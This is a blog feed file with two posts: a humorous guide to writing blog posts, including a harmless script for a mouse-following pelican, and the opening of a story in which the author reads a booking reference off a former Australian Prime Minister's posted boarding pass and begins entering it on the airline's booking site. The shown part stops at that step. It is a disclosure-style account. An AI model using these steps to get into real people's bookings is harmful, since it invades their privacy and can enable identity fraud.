Jekyll2022-05-07T06:06:29+00:00/feed.xmlmango.pdf.zoneyou have entered the m a n g o z o n emangopdfI give you feedback on your blog post draft but you don’t send it to me2021-08-20T22:30:00+00:002021-08-20T22:30:00+00:00/i-give-you-feedback-on-your-blog-post-draft-but-you-dont-send-it-to-me<p>You have opened the Post Editor, and found within yourself the courage to type Content. Critically, you have yet to click “Publish”.</p>
<p>This is the moment where a lot of people go horribly, irrecoverably wrong.</p>
<p>Yes I absolutely will review your draft, and do not even worry about sending it to me. I just end up saying the same things to everyone anyway, so that simply will not be necessary.</p>
<p>So yeah it looked pretty good. Definitely got words in it. Loved the bit about Galileo. You could probably just publish it and it would be fine.</p>
<p>But what if you don’t want <em>fine</em>?</p>
<p>What if you want it <em>all</em>?</p>
<hr />
<h1 id="professor-mangopdfs-grand-unified-theory-of-blogging">Professor mangopdf’s Grand Unified Theory of Blogging</h1>
<p>Some people’s Grand Unified Theory of Blogging is all like:</p>
<ol>
<li>It has a clickbait title</li>
<li>It’s long enough</li>
<li>💯 Publish 💯</li>
</ol>
<p>Yes thank you, very cool. But what about</p>
<p><img src="/img/howtoblog/grand_unified_theory.png" alt="The 3 steps" /></p>
<p>Do you see the order here? Steps 1 and 2?</p>
<p>You can write a <em>really</em> good blog post with just steps 1 and 2. Actually writing about the topic you’re supposed to be writing about is strictly optional.</p>
<p>But if you leave out the first 2 steps, it <em>doesn’t matter</em> what you’re trying to say.</p>
<p>You clowns are out there trying to tell people</p>
<blockquote>
<p><em>“I discovered bees can talk but unfortunately they are racist”</em></p>
</blockquote>
<p>But everyone stopped reading 3 sentences in because it started out all like</p>
<blockquote>
<p><em>honey gets delivered to the supermarket on Fridays, because the drivers have the weekends off, and the supermarkets aren’t open to accept deliveries on Thursdays</em>….</p>
</blockquote>
<p>And so on, and so forth, until the bees <strong>get away with it</strong>.</p>
<hr />
<h1 id="part-1-people-pay-attention-to-what-youre-saying">Part 1: People pay attention to what you’re saying</h1>
<p>You simply wanna make it easy for people to give your post the maximum volume of 👀 eyes emoji 👀</p>
<h2 id="the-title-gets-read-way-more-than-the-rest-so-make-it-count">The title gets read <em>way</em> more than the rest, so make it count</h2>
<p><img src="/img/howtoblog/title_icon.png" alt="The title-tiny" /></p>
<p>I dunno about you, but I vaguely read the titles of like 98 things before I click on one. Statistically, your blog post is one of those 98 things, so you <em>better</em> make each character count.</p>
<h3 id="what-should-the-title-look-like">What should the title look like?</h3>
<p>yes yes yes:</p>
<blockquote>
<p>I discovered bees can talk but unfortunately they are racist</p>
</blockquote>
<p>i’m begging you not to do this:</p>
<blockquote>
<p>It’s not just Barry from Bee Movie who might have a secret</p>
</blockquote>
<p>The title should represent the post as much as possible. It should prepare the reader emotionally for the clown carnival ride you are about to take them on.</p>
<p>It should be the <em>opposite</em> of clickbait.</p>
<p>You’ve been hurt so many times before, you brave and vulnerable internet traveller, you. Desperate for #content, asking yourself whether <em>this</em> top 10 article is the one that will finally win her back? I mean hey 10 is a lot of things, so surely your fulfilment lies within one of them.</p>
<p>Clickbait titles burned down my entire village and never text unless they want something. For 💲some reason💲 people keep writing them, though. So now when you look at headlines, you just have to guess what they’re about, like a caveman. A caveman scrolling clickbait titles. Listen, I dunno.</p>
<h3 id="how-about-i-title-it-x-for-fun-and-profit">How about I title it “X for fun and profit?”</h3>
<p>no</p>
<h2 id="listen-i-think-you-should-use-way-more-headings-im-talkin-a-lot">Listen. I think you should use <em>way</em> more headings. I’m talkin’ <em>a lot</em></h2>
<p>I don’t know about you, but when I read something I scroll around all over the place like a functional adult. If you have a lot of headings that describe the words under them, then other adults can stop scrolling and read a paragraph when they see a heading they like.</p>
<p>Paragraphs do a similar thing, but within each heading, letting the reader skip around even more, and we love that for them<sup id="fnref:onesentence" role="doc-noteref"><a href="#fn:onesentence" class="footnote" rel="footnote">1</a></sup>.</p>
<p>Basically, if your reader sees a wall of text, their brain will activate the evolutionary survival mechanism they have developed to <em>instantly</em> panic-close that tab, before the wall of text jumps out of the page and hecking eats them.</p>
<p><img src="/img/howtoblog/wall_of_text.png" alt="A wall of text-small" />
<em>Absolutely no way anyone’s reading this</em></p>
<h3 id="actually-write-the-headings-first">Actually, write the headings first</h3>
<p>This might just be a me thing, but it would be <em>very</em> brave of me to just log on and type. Writing out the headings lets you see if your sections flow on naturally to each other, or if anything’s missing, or if now that you’ve laid the whole thing out before you, this blog post was a mistake, for example.</p>
<h4 id="engage-in-subheadings">Engage in subheadings</h4>
<p>You don’t gotta stop at one heading, you can just keep going and going. And that? That’s value my friend.</p>
<h5 id="dont-go-too-hard">Don’t go too hard</h5>
<p>this is degeneracy</p>
<h2 id="you-gotta-make-the-post-interesting-enough-or-people-will-just-get-bored-and-leave">You gotta make the post interesting enough, or people will just get bored and leave?</h2>
<p>You know how you put all that effort into typing those words? What if someone just… didn’t read them? 😬 They can do that, you know. There’s nothing in the rules against it.</p>
<p>The days of having no choice but to read incredibly boring school textbooks to find the information you need to do this hecking history exam are over. You need not hold your reader hostage with boring and irrelevant details, as your textbooks did to you.</p>
<p>You can use uh blogging to break this vicious cycle and usher humanity into a golden age of Content. Nay, you must.</p>
<h3 id="oh-i-get-it-i-should-slap-a-tangentially-relevant-top-text-bottom-text-meme-every-few-paragraphs-and-call-it-a-day">“Oh, <em>I</em> get it, I should slap a tangentially relevant top text bottom text meme every few paragraphs and call it a day”</h3>
<p><img src="/img/howtoblog/bottomtext.jpg" alt="what the heck did you just bottom text-small" /></p>
<h3 id="keep-it-interesting-by-anticipating-what-the-reader-wants">Keep it interesting by anticipating what the reader wants</h3>
<p>What are they here for? It sure ain’t top text bottom text, I’ll tell ya that for free. It depends on what your post is trying to do. You wanna make the ideas flow on naturally from each other, so there’s no time to get bored and leave. For example:</p>
<h4 id="telling-a-story">Telling a story</h4>
<ol>
<li>Who is it about?</li>
<li>What happened to them?</li>
<li>How did they feel about that?</li>
</ol>
<h4 id="arguing-an-idea">Arguing an idea</h4>
<ol>
<li>What’s the problem with how things are?</li>
<li>What is the idea?</li>
<li>How does the idea solve the problem?</li>
</ol>
<h4 id="teaching-how-to-do-something-eg-blog-post-">Teaching how to do something (e.g. blog post 👀)</h4>
<ol>
<li>Tell the reader they’re a clown</li>
<li>Tell them bees are racist</li>
</ol>
<h3 id="classic-mistake-writing-about-what-you-find-interesting">Classic mistake: Writing about what <em>you</em> find interesting</h3>
<p>You already know that QPU movement takes a lot of speed, and it’s <em>incredible</em> that there’s a slope that’s <em>just right</em> for Mario to walk up it for 12 hours building up speed.</p>
<p>But unless your audience is in <em>exactly</em> the right niche, they don’t know what the <a href="https://www.youtube.com/watch?v=kpk2tdsPh0A">heck</a> you’re talking about, so they just shrug and don’t read it<sup id="fnref:exception" role="doc-noteref"><a href="#fn:exception" class="footnote" rel="footnote">2</a></sup>.</p>
<hr />
<p><br />
<br /></p>
<h1 id="part-2-people-understand-what-youre-saying">Part 2: People understand what you’re saying</h1>
<p>Somehow you have made it to the point where people are <em>reading</em> your words. This is most of the hard work honestly, you can take it easy from here except that <code class="language-plaintext highlighter-rouge">h a h a</code> no you can’t. That would risk being inaccessible on main, you see.</p>
<p>You have an idea in your head. <em>You</em> know what you mean with beautiful crystal clarity. But it sucks because you have get that idea in someone <em>else’s</em> head. And the worst part is you have to use <em>words</em> to do it? Buddy, I know how ya feel.</p>
<h2 id="constantly-ask-yourself-does-the-person-reading-this-know-what-the-heck-im-talking-about">Constantly ask yourself: <em>Does</em> the person reading this know what the heck I’m talking about?</h2>
<p>This is the most common thing I say, possibly ever, but definitely when reviewing people’s blog posts.</p>
<p>Obviously, you would not write something that you don’t understand<sup id="fnref:atme" role="doc-noteref"><a href="#fn:atme" class="footnote" rel="footnote">3</a></sup>. But what about the person you want to read it? They don’t know everything you know. So you gotta be reeeeeally careful not to accidentally assume your words make sense without the context in your brain.</p>
<h2 id="cut-out-the-jargon">Cut out the jargon</h2>
<p><img src="/img/howtoblog/best_practices.png" alt="image" /></p>
<p>Imagine reading</p>
<blockquote>
<p>Cached ITS has revolutionised attribution for resources in the Post-Contact era.</p>
</blockquote>
<p>Don’t worry, I just made this one up. There’s nobody out there actually writing this. But do you see how it makes <em>no sense</em>? That’s how you sound to people if you use words they don’t know.</p>
<p>Maybe buzzwords are safe though? No, I’m coming for them too. Buzzwords, if I have understood the meaning correctly, are “words that nobody understands but everyone thinks it’s good to say”. Artificial, and, I cannot stress this enough, Intelligence.</p>
<p>If your post’s audience don’t know the word? You are simply <em>banned</em> from writing it<sup id="fnref:explain" role="doc-noteref"><a href="#fn:explain" class="footnote" rel="footnote">4</a></sup>.</p>
<h3 id="cota">COTA</h3>
<p>(Cut out the acronyms)</p>
<p>I’m so sorry for doing that to you<sup id="fnref:main" role="doc-noteref"><a href="#fn:main" class="footnote" rel="footnote">5</a></sup>, but you had to <em>feel</em> how painful it is when someone point-blank blunders an acronym you don’t know into a heading.</p>
<p>Either expand the acronym the first time you use it, or simply remove it entirely? Can you just explain the concept, rather than using the shorthand or jargon for it?</p>
<p>You don’t have to say “cached”, you can say “saved for later”. You don’t have to say “powered by machine learning”, you can just say “please buy it i’m begging u we rly need a win”. You can just <em>do</em> that, and nobody will stop you<sup id="fnref:bravery" role="doc-noteref"><a href="#fn:bravery" class="footnote" rel="footnote">6</a></sup>.</p>
<h2 id="basically-take-any-excuse-to-use-a-picturediagram-instead-of-words">Basically take any excuse to use a picture/diagram instead of words</h2>
<p>Listen, sometimes it is too hard to explain where New Zealand is over text. “What? But it’s a small country with a vibrant honey economy, located just off the east coast of Austr-“. Stop this madness. What is an “east coast”. How far “off” is it? Does that mean an ocean is involved? What is a “country”? We do not know what this means.</p>
<p>You know what we <em>do</em> understand?</p>
<p><img src="/img/howtoblog/nz.png" alt="New Zealand|small" />
<span></span></p>
<p>We live in a world of rich media where you can probably embed a <a href="#pelicantime">talking pelican that follows the mouse around the screen and gives tax advice</a><sup id="fnref:rattles" role="doc-noteref"><a href="#fn:rattles" class="footnote" rel="footnote">7</a></sup> in your post, to say nothing of a picture.</p>
<div class="pelican-time">
<style>
.pelican-time {
position: fixed;
top: 0;
left: 0;
display: none;
}
.speech-bubble {
font-family: "Comic Sans MS", "Comic Sans", cursive;
display: none;
}
.tax-advice {
position: absolute;
max-width: 175px;
/* when ur a top */
top: 22%;
/* when ur a leftist*/
left: 81%;
transform: translate(-50%, -50%);
font-size: 12pt;
line-height: normal;
color: black;
text-align: center;
}
.pelican-image {
padding-top: 75px;
padding-left: 50px;
}
</style>
<div class="pelican">
<div class="row">
<div class="column">
<div class="pelican-image">
<img src="/img/howtoblog/pelican/pelican_NO_MALWARE.gif" />
</div>
</div>
<div class="column">
<div class="speech-bubble">
<img src="/img/howtoblog/pelican/CLOUDBUBBLE.png" width="200" height="150" />
<div class="tax-advice">
TAX ADVICE <br /> OK? LOREM <br /> IPSUM?
</div>
</div>
</div>
</div>
<script type="text/javascript">
const pelican = document.querySelector('.pelican');
pelican.style.transform= `translateX(${400}px)`
window.addEventListener('mousemove', (evt) => {
var rect = pelican.getBoundingClientRect();
const x = evt.clientX - 400;
const y = Math.max(evt.clientY, 0);
const xLimit = 0;
const yLimit = $(window).height() - rect.height;
//if not out of bounds, move both axis!
if (x>0 && y<yLimit) {
pelican.style.transform = `translateX(${x}px) translateY(${y}px)`;
}
// if up against a wall (wink), only move y axis
if (x<0) {
pelican.style.transform = `translateX(${xLimit}px) translateY(${y}px`;
}
//if squashed below, only move x axis
if (y>yLimit) {
pelican.style.transform = `translateX(${x}px) translateY(${yLimit}px)`;
}
//if in the corner, stay in corner
if (y>yLimit && x<0) {
pelican.style.transform = `translateX(${xLimit}px) translateY(${yLimit}px)`;
}
});
const speechBubble = document.getElementsByClassName('speech-bubble')[0];
const taxAdvice = document.getElementsByClassName('tax-advice')[0];
//WAIT FUNCTIONS
function dontSpeak() {
speechBubble.style.display = "none";
setTimeout(speak, 3000);
}
function speak() {
chooseRandomTaxAdvice();
speechBubble.style.display = "block";
setTimeout(dontSpeak, 4000);
}
var arr = ["PAY UR TAXES ON TIME",
"Lodge by October 31 (In Aus)",
"Check your eligibility for deductions",
"Get help from a registered tax agent",
"Buy Low, Sell High",
"Fish are my income!",
"Chippies are my income!",
"Continue Avoiding Debt Collectors!",
"*Pelican noises*",
"Claim work-related expenses"];
function random(mn, mx) {
return Math.random() * (mx - mn) + mn;
}
function chooseRandomTaxAdvice() {
taxAdvice.innerHTML = arr[Math.floor(random(1, arr.length))-1];
}
//TAX ADVICE:
dontSpeak()
document.querySelector("a[href='#pelicantime']").addEventListener('click', () => {
const pelicanTime = $('.pelican-time');
pelicanTime.toggle()
});
</script>
</div>
</div>
<h2 id="use-more-examples-im-talkin-wayyyyyyy-more">Use more examples. I’m talkin’ wayyyyyyy more</h2>
<p>Hey, does this help you understand what a preposition is?</p>
<blockquote>
<p>A preposition is a word or group of words used before a noun, pronoun, or noun phrase to show direction, time, place, location, spatial relationships, or to introduce an object.</p>
</blockquote>
<p>No, this is what a Terms of Service page would say if they could talk and also we let them write blog posts.</p>
<p>How about:</p>
<blockquote>
<p>Prepositions are words like “on,” “in,” “under,” and “beside,”. For example, “The ravioli is <strong>in</strong> the briefcase <strong>behind</strong> you.”</p>
</blockquote>
<p>Yes 👏 KING that’s the 👏 stuff 👏 right there.</p>
<h2 id="put-a-summary-at-the-top-maybe">Put a summary at the top maybe?</h2>
<p><img src="/img/howtoblog/tldr_icon.png" alt="Summary Icon|tiny" />
<span id="tell-nobody-what-u-saw"></span></p>
<p>You wanna let the reader quickly decide whether to read your post or not. Maybe they get what they wanted <em>just</em> from the summary, and can just stop reading there, <em>instantly</em> winning you a Nobel Peace Prize but for like, blogging.</p>
<p>In the first few sentences, you want the reader to know:</p>
<ul>
<li>Who is this for?</li>
<li>What’s going to happen?</li>
</ul>
<h2 id="get-to-the-point">Get to the point</h2>
<p>If you want to say</p>
<blockquote>
<p>“Get someone to review your blog post before you publish it.”</p>
</blockquote>
<p>Then you can just <em>say</em> that<sup id="fnref:trouble" role="doc-noteref"><a href="#fn:trouble" class="footnote" rel="footnote">8</a></sup>.</p>
<p>You don’t have to first say:</p>
<blockquote>
<p>“It’s best practice to consider different perspectives. A review by an independent third party can lead to increased success.”</p>
</blockquote>
<p>What are you trying to <em>tell</em> me? It’s so vague it could mean anything. Who <em>talks</em> like that? When is this post going to get to the bit where we <a href="https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram">steal the Prime Minister’s identity on main</a>? One day a long time ago, I guess someone decided you look fancy if you write so vaguely you’re hard to understand. “Maybe they’ll will think I’m hard to understand because I’m so <em>smart</em>”, they thought, with their perfectly smooth and spherical brain.</p>
<h2 id="what-if-you-just-wrote-more-like-how-you-talked">What if you just wrote more like how you talked?</h2>
<p>Bit controversial, but you know how listening to someone explain something usually makes <em>sense</em><sup id="fnref:well" role="doc-noteref"><a href="#fn:well" class="footnote" rel="footnote">9</a></sup>? It’s a lot harder to be completely incoherent when you’re talking, because you can hear yourself. But writing? You can casually write “thusly, delivering more impact” like a serial LinkedIn poster without even noticing. You monster.</p>
<p>So sometimes I try saying what I want to say out loud to myself, alone in my room like a serial LinkedIn poster. Buuuut it often reads better than whatever I had before, thusly delivering more impact.</p>
<h3 id="write-it-like-youre-trying-to-trick-the-reader-into-understanding-what-you-mean-in-as-few-words-as-possible">Write it like you’re trying to trick the reader into understanding what you mean in as few words as possible</h3>
<p>Because you are.</p>
<hr />
<h2 id="you-gotta-edit-at-least-once">You <em>gotta</em> edit at least once</h2>
<p>What, you think you’re just going to sit down and type the whole thing in one go, fearlessly hitting “Post” as you type the last full stop? What about the <code class="language-plaintext highlighter-rouge">consequences</code> of your <code class="language-plaintext highlighter-rouge">earlier actions</code>???</p>
<h3 id="cut-bits-out-ruthlessly">Cut bits out ruthlessly</h3>
<p><img src="/img/howtoblog/cut_out_icon.png" alt="Cut bits out|tiny" /></p>
<p>You can cut out <em>so much</em> by simply realising “actually, the reader doesn’t care about that.” <em>Simply</em> delete it, and the post loses nothing, so the overall quality goes up. That’s just economics.</p>
<h3 id="get-someone-to-review-it">Get someone to review it</h3>
<p>Get a <em>lot</em> of someones to review it<sup id="fnref:irony" role="doc-noteref"><a href="#fn:irony" class="footnote" rel="footnote">10</a></sup>. You know how when you try on clothes, you get someone else’s opinion before you buy it? How bout you see if your post makes sense before you…. wear it? I’m sorry.</p>
<p>I usually ask reviewers to point out anything:</p>
<ul>
<li>Hard to understand</li>
<li>Wrong</li>
<li>Not necessary</li>
<li>That doesn’t flow on naturally from the previous bit</li>
</ul>
<p>This process is a <em>lot</em> easier if you use something that lets people highlight text and comment on it, like <a href="https://docs.google.com">Google Docs</a>, but you can continue to email <code class="language-plaintext highlighter-rouge">my Blog post (fixed version) (updated) FINAL__FINALFINAL (1).docx</code> or do it in the TikTok comments if you must.</p>
<hr />
<p>Okay that was the hard part. People are now reading your post, and understanding what you mean, which means you’ve achieved blogging supremacy. You could probably blog down everything in a 2km radius<sup id="fnref:miles" role="doc-noteref"><a href="#fn:miles" class="footnote" rel="footnote">11</a></sup> from here. If you <em>want</em> you can keep going, but honestly you could just hit “Publish” here and probably nobody would notice.</p>
<h1 id="part-3-you-say-the-thing">Part 3: You say the thing</h1>
<p>No that’s it, this part is all you.</p>
<p><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></p>
<hr />
<h1 id="post-credits-cutscene-but-how-do-i-decide-what-to-write-about">Post-credits cutscene: But how do I decide <em>what</em> to write about?</h1>
<p>Oh,,,,, hello. You’re still here? Well….. I suppose we could get,,, <code class="language-plaintext highlighter-rouge">p h i l o s o p h i c a l</code></p>
<h2 id="who-is-the-audience">Who is the audience?</h2>
<p>Just by asking this question you have already galaxy brained past many, many bland and tasteless blog posts.</p>
<p>If you are writing something for the audience of “anyone”, you aren’t allowed to assume anything about them.</p>
<p>For example, the wide-ranging “anyone” audience includes toddlers who cannot read, or use a spoon correctly. They will not know what the acronym “FOI” stands for, because they still working on the idea of letters.</p>
<p>But if your audience is like, “Big Honey”, or “people who have sinned once and want to know more”, or “the group chat”, you <em>can</em> make some assumptions. You can say why they might want to read your post in the first place<sup id="fnref:giving" role="doc-noteref"><a href="#fn:giving" class="footnote" rel="footnote">12</a></sup>.</p>
<h3 id="-good-reasons-to-post">✅ Good reasons to Post</h3>
<ul>
<li>You are the only person in the world with this information, and other people might want to know it (publishing something new)</li>
<li>Fanfic (any)</li>
<li>To share how to do something, so other people can learn it 👀</li>
<li>To tell a story</li>
<li>Just for fun, to be entertaining</li>
<li>To announce something your audience will be interested in</li>
</ul>
<h3 id="-bad-reasons-to-post">❎ Bad reasons to Post</h3>
<ul>
<li>Someone told you that you have to write about this</li>
<li>“For visibility”
<ul>
<li>What does that <em>mean</em>?</li>
<li>Is it visible if nobody reads it 🤔</li>
</ul>
</li>
<li>Need somewhere to remember all your passwords</li>
<li>To encourage people to buy your product
<ul>
<li>The post is now an ad</li>
<li>Who would read it on purpose?</li>
</ul>
</li>
<li>To document how something you made works
<ul>
<li>Might be better in <a href="https://docs.github.com/en/free-pro-team@latest/github/building-a-strong-community/about-wikis">wiki format</a>, with multiple pages linking to each other</li>
</ul>
</li>
</ul>
<h2 id="ask-yourself-why-are-you-doing-gestures-all-this">Ask yourself: <em>Why</em> are you doing *gestures* <em>all this</em>?</h2>
<p>Why are you here? What are you trying to do? What is it that you’re trying to make happen, using blogging as the metaphorical sparks with which to ignite the fuse of the bulk-discount fireworks of revolution?</p>
<p>It’s possible you can get incredible editorial value by simply realising you do not want to Post at all, or that you actually want to change what you’ve written completely. I rewrote more than half of this post, and it’s <em>still</em> got that bulk-discount fireworks bit in it.</p>
<hr />
<h2 id="the-conclusion">The conclusion</h2>
<p>Usually I just suddenly end by asking some dumb question then cutting off abruptly.</p>
<h2 id="like-what">Like what?</h2>
<p>gottem</p>
<hr />
<p><br />
<br />
<br />
<br /></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:onesentence" role="doc-endnote">
<p>It is absolutely okay to do the #journalism thing of having one sentence per paragraph, even if it looks jank at first. <a href="#fnref:onesentence" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:exception" role="doc-endnote">
<p>Of course, you can go <em>off</em> talking about something you find interesting, so long as you explain it in a way the audience can understand. You can use the Mario 0.5x A presses video as your guiding light, your North Star, if you will. <a href="#fnref:exception" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:atme" role="doc-endnote">
<p>don’t @ me <a href="#fnref:atme" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:explain" role="doc-endnote">
<p>Unless you explain it first, but even then… <a href="#fnref:explain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:main" role="doc-endnote">
<p>and for being problematic on main. <a href="#fnref:main" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:bravery" role="doc-endnote">
<p>Of course, if you’re confident everyone reading your post will know those acronyms, or it doesn’t matter if they don’t know them, then be my guest. No, please. I simply insist. <a href="#fnref:bravery" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:rattles" role="doc-endnote">
<p>thank u <a href="https://open.spotify.com/artist/4YrZTJmrwvUhUWGAsohGgQ">rattlebones</a> for blessing us with this pelican. (sorry, u have to be using a mouse to read this for the <a href="https://nebula.wsimg.com/360920e58a126715c141a5d2230904e5?AccessKeyId=FD728A617B617E8917F9&disposition=0&alloworigin=1">pelican</a> to visit. think about it.) <a href="#fnref:rattles" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:trouble" role="doc-endnote">
<p>It’s okay. Anyone gives you trouble, tell ‘em I sent ya 😘 <a href="#fnref:trouble" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:well" role="doc-endnote">
<p>Welllllllll actually that’s a pretty big claim isn’t it. <a href="#fnref:well" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:irony" role="doc-endnote">
<p>yes thank you i do see the irony in this, no i will not be taking questions at this time <a href="#fnref:irony" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:miles" role="doc-endnote">
<p>This is about 60 degrees Fahrenheit, for all you Americans out there. <a href="#fnref:miles" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:giving" role="doc-endnote">
<p>Of course, I’m assuming you’re blogging because you’re <em>wanting</em> other people to read it. If you’re just writing it for you, go off king, you don’t need my unprompted journalism opinions. <a href="#fnref:giving" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>mangopdfThat simply will not be necessary.When you browse Instagram and find former Australian Prime Minister Tony Abbott’s passport number2020-09-15T22:30:00+00:002020-09-15T22:30:00+00:00/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram-qantas<p><img src="/img/sunburnt-country/title.png" alt="title image what's up twitter-large" /></p>
<h1 id="act-1-sunday-afternoon">Act 1: Sunday afternoon</h1>
<p>So you know when you’re flopping about at home, minding your own business, drinking from your water bottle in a way that does not possess <em>any</em> intent to subvert the Commonwealth of Australia?</p>
<p>It’s a feeling I know all too well, and in which I was vigorously partaking when I got this message in “the group chat”<sup id="fnref:groupchat" role="doc-noteref"><a href="#fn:groupchat" class="footnote" rel="footnote">1</a></sup>.</p>
<p><img src="/img/sunburnt-country/groupchat.png" alt="Can you hack this man?|medium" />
<em>A nice message from my friend, with a photo of a boarding pass 🙂 A good thing about messages from your friends is that they do not have any rippling consequences 🙂🙂🙂</em></p>
<p>The man in question is <a href="https://en.wikipedia.org/wiki/Tony_Abbott">Tony Abbott</a>, one of Australia’s <em>many</em> former Prime Ministers.</p>
<p><img src="/img/sunburnt-country/tony_abbott_wikipedia.png" alt="if u google tony abbott u get this|small" />
<em>That’s him, officer</em></p>
<p>For security reasons, we try to change our Prime Minister every six months, and to never use the same Prime Minister on multiple websites.<sup id="fnref:kevin07" role="doc-noteref"><a href="#fn:kevin07" class="footnote" rel="footnote">2</a></sup></p>
<h4 id="the-boarding-pass-photo">The boarding pass photo</h4>
<p>This particular former PM had just posted a picture of his boarding pass on Instagram (Instagram, in case you don’t know it, is an app you can open up on your phone any time to look at ads).</p>
<p><img src="/img/sunburnt-country/instagrampost.PNG" alt="Instagram post showing boarding pass|large" />
<em>The since-deleted Instagram post showing the boarding pass and baggage receipt. The caption reads “coming back home from japan 😍😍 looking forward to seeing everyone! climate change isn’t real 😌 ok byeee”</em></p>
<h4 id="can-you-hack-this-man">“Can you hack this man?”</h4>
<p>My friend<sup id="fnref:hoggemoade" role="doc-noteref"><a href="#fn:hoggemoade" class="footnote" rel="footnote">3</a></sup> (who we will refer to by their group chat name, 𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊) is asking<sup id="fnref:onbehalf" role="doc-noteref"><a href="#fn:onbehalf" class="footnote" rel="footnote">4</a></sup> whether I can “hack this man” not because I am the kind of person who regularly commits 𝒄𝒚𝒃𝒆𝒓 𝒕𝒓𝒆𝒂𝒔𝒐𝒏 on a whim, but because we’d recently been talking about boarding passes.</p>
<p>I’d said that people post pictures of their boarding passes all the time, not knowing that it can sometimes be used to get their passport number and stuff. They just post it being like “omg going on holidayyyy 😍😍😍”, unaware that they’re posting cringe.</p>
<p><img src="/img/sunburnt-country/instagramboardingpasses.png" alt="screenshot of #boardingpass on instagram|medium" />
<em>People post their boarding passes all the time, because it’s not clear that they’re meant to be secret</em></p>
<p>Meanwhile, some hacker is rubbing their hands together, being all “yumyum identity fraud 👀” in their dark web Discord, because this happens a <em>lot</em>.</p>
<p><img src="/img/sunburnt-country/boardingpassposts.png" alt="screenshot of #boardingpass on instagram" /></p>
<hr />
<p>So there I was, making intense and meaningful eye contact with this chat bubble, asking me if I could “hack this man”.</p>
<h3 id="surely-you-wouldnt">Surely you wouldn’t</h3>
<p>Of course, my friend wasn’t <em>actually</em> asking me to hack the former Prime Minister.</p>
<p><br />
<br />
<br />
<br />
<br /></p>
<p>However.</p>
<p><br />
<br />
<br />
<br />
<br />
<br /></p>
<p>You <em>gotta</em>.</p>
<p>I mean… what are you gonna do, <em>not</em> click it? Are you gonna let a <em>link</em> that’s like 50% advertising tracking ID tell you what to do? Wouldn’t you be <em>curious</em>?</p>
<p>The former Prime Minister had just posted his boarding pass. Was that <em>bad</em>? Was someone in danger? I didn’t know.</p>
<p>What I did know was: the <em>least</em> I could do<sup id="fnref:nocrime" role="doc-noteref"><a href="#fn:nocrime" class="footnote" rel="footnote">5</a></sup> for my country would be to have a casual browse 👀</p>
<h2 id="investigating-the-boarding-pass-photo">Investigating the boarding pass photo</h2>
<h3 id="step-1-hubris">Step 1: Hubris</h3>
<p>So I had a bit of a casual browse, and got the picture of the boarding pass, and then…. I didn’t know what was supposed to happen after that.</p>
<p>Well, I’d heard that it’s bad to post your boarding pass online, because if you do, a bored 17 year-old Russian boy called “Katie-senpai” might somehow use it to commit identity fraud. But I don’t know anyone like that, so I just clumsily googled some stuff.</p>
<h4 id="googling-how-2-hakc-boarding-pass">Googling how 2 hakc boarding pass</h4>
<p><img src="/img/sunburnt-country/uhhboardingpasshacking.png" alt="uhhh|small" /></p>
<p>Eventually I found <a href="https://null-byte.wonderhowto.com/how-to/hackers-use-hidden-data-airline-boarding-passes-hack-flights-0180728/">a blog post</a> explaining that yes, pictures of boarding passes can indeed be used for Crimes. The part you wanna be looking at for all your criming needs is the barcode, because it’s got the “Booking Reference” (e.g. <code class="language-plaintext highlighter-rouge">H8JA2A</code>) in it.</p>
<p>Why do you want the booking reference? It’s one of the two things you need to log in to the airline website to manage your flight.</p>
<p>The second one is your… last name. I was really hoping the second one would be like a password or something. But, no, it’s the booking reference the airline emails you and prints on your boarding pass. And it also lets you log in to the airline website?</p>
<p>That sounds suspiciously like a password to me, but like I’m still fine to pretend it’s not if you are.</p>
<h3 id="step-2-scan-the-barcode">Step 2: Scan the barcode</h3>
<p>I’ve been practicing every morning at sunrise, but still can’t scan barcodes with my eyes. I had to settle for a barcode scanner app on my phone, but when I tried to scan the picture in the Instagram post, it didn’t work :((</p>
<p><img src="/img/sunburnt-country/boardingpass.png" alt="the boarding pass photo" />
<em>Maybe I shouldn’t have blurred out the barcode first</em></p>
<h3 id="step-2-scan-the-barcode-but-more">Step 2: Scan the barcode, but more</h3>
<p>Well, maybe it wasn’t scanning because the picture was too blurry.</p>
<p>I spent around 15 minutes in an “enhance, ENHANCE” montage, fiddling around with the image, increasing the contrast, and so on. Despite the montage taking up way too much of the 22 minute episode, I couldn’t even get the barcode to scan<sup id="fnref:step3" role="doc-noteref"><a href="#fn:step3" class="footnote" rel="footnote">6</a></sup>.</p>
<h3 id="step-2-notice-that-the-booking-reference-is-printed-right-there-on-the-paper">Step 2: Notice that the Booking Reference is printed right there on the paper</h3>
<p>After staring at this image for 15 minutes, I noticed the Booking Reference is just… printed on the baggage receipt.</p>
<p>I graduated university.</p>
<p>But it did not prepare me for this.</p>
<p><img src="/img/sunburnt-country/bookingrefhighlighted.png" alt="Boarding pass with booking reference highlighted" />
<em>askdjhaflajkshdflkh</em></p>
<h3 id="step-3-visit-the-airlines-website">Step 3: Visit the airline’s website</h3>
<p><img src="/img/sunburnt-country/bookinglogin2.png" alt="Manage booking login screen with empty fields-large" /></p>
<p>After recovering from <em>that</em> emotional rollercoaster, I went to <a href="https://qantas.com.au">qantas.com.au</a>, and clicked “Manage Booking”. In case you don’t know it because you live in a country with fast internet, Qantas is the main airline here in Australia.</p>
<p>(I also very conveniently started recording my screen, which is gonna pay off <em>big time</em> in just a moment.)</p>
<h3 id="step-4-type-in-the-booking-reference">Step 4: Type in the Booking Reference</h3>
